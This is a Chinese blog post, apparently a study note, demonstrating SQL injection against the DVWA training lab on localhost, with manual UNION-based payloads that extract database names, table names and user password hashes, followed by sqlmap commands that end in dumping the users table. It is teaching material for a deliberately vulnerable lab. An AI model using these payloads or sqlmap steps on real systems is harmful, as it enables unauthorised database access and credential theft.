DVWA中SQL注入漏洞

已于 2023-12-26 10:48:21 修改
阅读量432 收藏 9
点赞数 8
文章标签: sql
于 2023-12-15 09:43:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79917992/article/details/135008325
版权

 1.正确调试

1' and 1=1#

2.错误调试

1' and 1=2#

3.如何拿到用户数据

(1)判断列/字段数

1' order by 1# 

1' order by 2# 

1' order by 3#

..................... 

(2)联合查询其他信息

注 :联合查询 前后查询的列数 要对应上才行

1' union select user(),database()#

user() :返回当前数据库连接用户

database() :返回当前数据库名称

(3)联合查询表

1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#

   如果报错,可以参考这篇文章

如何解决DVWA靶场中返回的报错信息 “Illegal mix of collations for operation ‘UNION‘ ”_dvwa illegal mix of collations for operation 'unio-CSDN博客

(4)联合查询用户名和密码

1' union select user,password from users#

4.使用sqlmap

sqlmap下载官网

https://sqlmap.org/

打开sqlmap :在下载的sqlmap目录里面打开cmd,输入

python sqlmap.py

或者

在kali中直接输入sqlmap

(1)检测漏洞

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8"

      cookie 在DVWA网站里面按F12,找到网络(Network),选择第一个,在Headers里面往下翻找到Cookie,并复制。

(2)获取数据库名

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" --dbs

(3)获取指定数据库表

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa --tables

(4)获取指定数据库列/表项

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa -T users --columns

(5)获取数据

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa -T users --dump
氵氵氵冫
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
学习之sql注入漏洞网址的创建
06-06
在我们的学习环境sqlmap可以用来验证我们创建的URL是否真正存在SQL注入漏洞。 接着,`wamp`是一个Windows下的Web开发环境,包含Apache、MySQL和PHP,它们共同构成了一套运行PHP网页和MySQL数据库的基础架构。在...
DVWASQL注入漏洞
weixin_56306210的博客
01-30 2439
DVWASQL注入漏洞
DVWASQL注入漏洞学习记录
最新发布
冷人 菜鸟 的博客
03-29 359
这个命令将返回users表所有的行,因为'1'='1'条件始终为真。SQL注入漏洞是指攻击者通过在应用程序的输入字段插入恶意的SQL代码,从而绕过应用程序的身份验证和访问控制,进而执行操纵数据库的操作。这种漏洞是由于应用程序没有对用户输入进行充分的验证和过滤导致的。这个命令将返回users表所有的行,因为'1'='1'条件始终为真。
渗透测试——五、网站漏洞——SQL注入
钟言的博客
12-05 1万+
本篇为学习渗透测试第五课,网站漏洞SQL注入,详细内容如下:一、走进DVWA测试网站 1、网站渗透测试步骤 2、DVWA网站 3、其他漏洞网站 4、进入DVMA网站 二、暴力破解和SQL注入 1、暴力破解 2、SQL语句 3、PHP语言 4、暴力破解页面之Burp Suite破解 5、暴力破解页面之SQL注入 6、SQL注入页面之 SQL注入 7、SQL注入(盲注)页面之 SQL注人 8、SQL注入(盲注)页面之SQLMap 自动注入等等
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3364
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
[DVWA]利用SQL注入漏洞的方法
weixin_45942044的博客
11-22 1012
自学[DVWA]SQL注入漏洞的学习笔记
SQL注入漏洞讲解
02-02
### SQL注入漏洞详解 #### 一、SQL注入概念与危害 **SQL注入**是一种常见的Web安全漏洞,它允许攻击者将恶意SQL代码插入到应用程序的数据输入字段,从而执行未授权的操作,例如读取或修改数据库的数据。SQL...
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
接着是DVWA,这个应用设计有多个安全漏洞,包括跨站脚本(XSS)、文件包含漏洞SQL注入等,用于模拟真实世界的网络安全问题。通过DVWA,开发者或安全研究人员可以实践如何发现这些漏洞,并学习如何修复它们。每个...
利用漏洞注入之SQL注入
11-10
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库的敏感信息。在本章,我们将深入理解SQL注入的工作原理,并通过实例学习如何利用和防范这种攻击。 首先,我们来看6.1...
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1675
DVWAsql注入漏洞-low
通过DVWA学习SQL注入漏洞
Mi1k7ea
02-21 2万+
此篇文章作为本人的学习小笔记,有任何不足之处望各位大牛多多指教~ SQL注入漏洞作为OWASP TOP10重要的一部分,可见其安全性的危害有多大。简单地说,SQL注入就是通过构建特殊的具有SQL语法的语句,绕到数据库进而执行相应的操作的漏洞。关于SQL注入更多的描述就不再多说了,网上资料也很多,下面就直接上笔记。 基于报错的检测方法: 各种符号以及组合: ‘  “  (  %
DVWA亲测SQL注入漏洞
YWBOY-小忘-安全菜鸟-Web狗
08-09 571
介绍: 关于sql注入的基础知识,我上篇文章也写过了,这篇就用靶机的漏洞环境来实践操作一下,所谓实践出真理嘛,我们这次试用的漏洞平台是DVWA,Github下载地址:DVWA 关于一下注入的基本知识或者姿势,我会在实践详解。 实验: LOW等级 先输入1看一下 我们在加个单引号 这里的搜索框为什么没有显示单引号呢?因为被url编码了 一般的url编码其实就是那个字符的ASCII值得十六进制,...
DVWA漏洞测试之SQL注入
JBlock的博客
11-08 4679
我们已经在前面讨论过sql注入漏洞产生的原因和一些绕过waf的技巧。今天话不多说直接上测试:首先我们先理清手工注入思路: 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库的表 6.获取表的字段名 7.下载数据LOW级别必须的第一步,看源码:<?php if( isset( $_REQUEST[
dvwasql注入学习(不同级别)
热门推荐
过客璇璇的博客
03-24 4万+
dvwasql注入学习(不同级别) 级别:Low 从页面上看到,有一个可以提交查询内容的地方 我们可以通过以下步骤判断这里是否存在注入点 ① 输入1 提交 ②输入1' 提交 ③输入1 and 1=1提交 ④输入1 and 1=2提交 由上可以看出是存在注入点的, 我们猜测sql查询语句是这样的: select First name的列名 a...
1.3 DVWA亲测sql注入漏洞
weixin_30289831的博客
04-11 204
LOW等级 我们先输入1 我们加上一个单引号,页面报错 我们看一下源代码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "S...
渗透测试之DVWA的Medium级别的SQL注入
追风筝的孩子
08-14 6292
Medium SQL Injection Source是通过一个下拉表的方式提交数据的。选择数据后提交,发现URL不是GET注入,是把提交的数据存放到post数据 先把源代码放出来 &lt;?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysql_real_e...
网络安全——DVWASQL注入漏洞
猿的一天
01-10 2550
网络安全——DVWASQL注入漏洞
dvwa学习sql注入 low级别
过客璇璇的博客
03-11 5260
刚刚学习web安全,老师第二节课就让用dvwa学习sql注入了,下面是我自己通过书上的学习以及在dvwa摸索的过程,求大牛们多多指点,勿要喷我级别:Low从页面上看到,有一个可以提交查询内容的地方我们可以通过以下步骤判断这里是否存在注入点① 输入1  提交②输入1' 提交③输入1 and 1=1 提交④输入1 and 1=2提交由上可以看出是存在注入点的,  我们猜测sql查询语句是这样的:  s...
2021-02-06
zhaodoudou1221的博客
02-06 418
**DVWA-SQL Injection ** SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入(非盲注)的步骤 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定显示的字段顺序 4.查数据库 5.查表 6.获取表的字段名
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值